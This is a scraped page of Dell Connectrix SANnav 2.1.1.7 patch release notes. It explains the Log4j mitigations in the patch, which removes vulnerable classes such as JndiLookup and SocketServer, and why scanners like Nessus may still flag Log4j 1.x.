Dell Connectrix DS 6630B SANnav Management Portal 2.1.1.7 CSI Patch Release Co - Page 3

Important Notes Regarding Software Security Scans and Log4j, SANnav v2.1.1.7 Patch Release Content

Get Dell Connectrix DS 6630B PDF manuals and user guides View all Dell Connectrix DS 6630B manuals
Add to My Manuals
Save this manual to your list of manuals

Page 3 highlights

Important Notes Regarding Software Security Scans and Log4j - SocketServer Note: All of these objects are removed from the SANnav code with this CSI patch. ? Log4j 2.x mitigation  In prior releases confirm that if the JDBC Appender is being used it is not configured to use any protocol other than Java. Note: This is the mitigation that is provided in this SANnav patch.  Upgrade to Log4j 2.17.1 (for Java 8 and later). Note: Due to the significant complexity in upgrading components using OSS components with Log4j 2.x, this mitigation is NOT provided in this SANnav patch.  Upgrade to Log4j 2.17.1 (for Java 8 and later). Important Notes Regarding Software Security Scans and Log4j 1. Security scanners that scan down inside code to validate that potentially vulnerable class objects exist or have been removed will report "Mitigated" after applying this CSI patch. Logpresso and other such scanners will indicate the related SANnav files as "MITIGATED". 2. Other scanners that do not scan down inside code may still indicate potential vulnerabilities after applying this CSI patch. This is because Log4j version 1.x code is still present within SANnav, even though the vulnerable objects have been removed. Nessus is one such scanner, and may report the following:  156860 - Apache Log4j 1.x Multiple Vulnerabilities - According to its self-reported version number, the installation of Apache Log4j on the remote host is 1.x and is no longer supported. Log4j reached its end of life prior to 2016. - Log4j 1.x is affected by multiple vulnerabilities  156032 - Apache Log4j Unsupported Version Detection - A logging library running on the remote host is no longer supported. Note that while SANnav is not believed to be vulnerable to any of the identified Log4j 1.x CVEs, this CSI patch addresses any potential exploit by removing the impacted Log4j 1.x classes. SANnav v2.1.1.7 Patch Release Content This patch includes the following fixes/updates: 1. This SANnav v2.1.1.7 CSI patch includes the following updates to mitigate the Log4j 2.x vulnerabilities previously explained:  A script that removes the following Java classes from the Log4j 1.x jars in SANnav code to eliminate any possible exploits. By removing these classes, SANnav code is fully remediated against all currently known Log4j 1.x vulnerabilities. - JndiLookup Dell Connectrix SANnav Portal Patch Release Content Notes 3

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
Important Notes Regarding Software Security Scans and Log4j
Dell Connectrix SANnav Portal Patch Release Content Notes
3
SocketServer
Note:
All of these objects are removed from the SANnav code with this CSI patch.
?
Log4j 2.x mitigation
In prior releases confirm that if the JDBC Appender is being used it is not configured to use
any protocol other than Java.
Note:
This is the mitigation that is provided in this SANnav patch.
Upgrade to Log4j 2.17.1 (for Java 8 and later).
Note:
Due to the significant complexity in upgrading components using OSS
components with Log4j 2.x, this mitigation is NOT provided in this SANnav patch.
Upgrade to Log4j
2.17.1
(for
Java 8
and later).
Important Notes Regarding Software Security Scans and
Log4j
1.
Security scanners that scan down inside code to validate that potentially vulnerable class objects exist or have
been removed will report “Mitigated” after applying this CSI patch.
Logpresso and other such scanners will indicate the related SANnav files as “MITIGATED”.
2.
Other scanners that do not scan down inside code may still indicate potential vulnerabilities after applying this
CSI patch. This is because Log4j version 1.x code is still present within SANnav, even though the vulnerable
objects have been removed.
Nessus is one such scanner, and may report the following:
156860 - Apache Log4j 1.x Multiple Vulnerabilities
According to its self-reported version number, the installation of Apache Log4j on the remote host is 1.x
and is no longer supported. Log4j reached its end of life prior to 2016.
Log4j 1.x is affected by multiple vulnerabilities
156032 - Apache Log4j Unsupported Version Detection
A logging library running on the remote host is no longer supported.
Note that while SANnav is not believed to be vulnerable to any of the identified Log4j 1.x CVEs, this CSI patch
addresses any potential exploit by removing the impacted Log4j 1.x classes.
SANnav v2.1.1.7 Patch Release Content
This patch includes the following fixes/updates:
1.
This SANnav v2.1.1.7 CSI patch includes the following updates to mitigate the Log4j 2.x vulnerabilities previously
explained:
A script that removes the following Java classes from the Log4j 1.x jars in SANnav code to eliminate any
possible exploits. By removing these classes, SANnav code is fully remediated against all currently known
Log4j 1.x vulnerabilities.
JndiLookup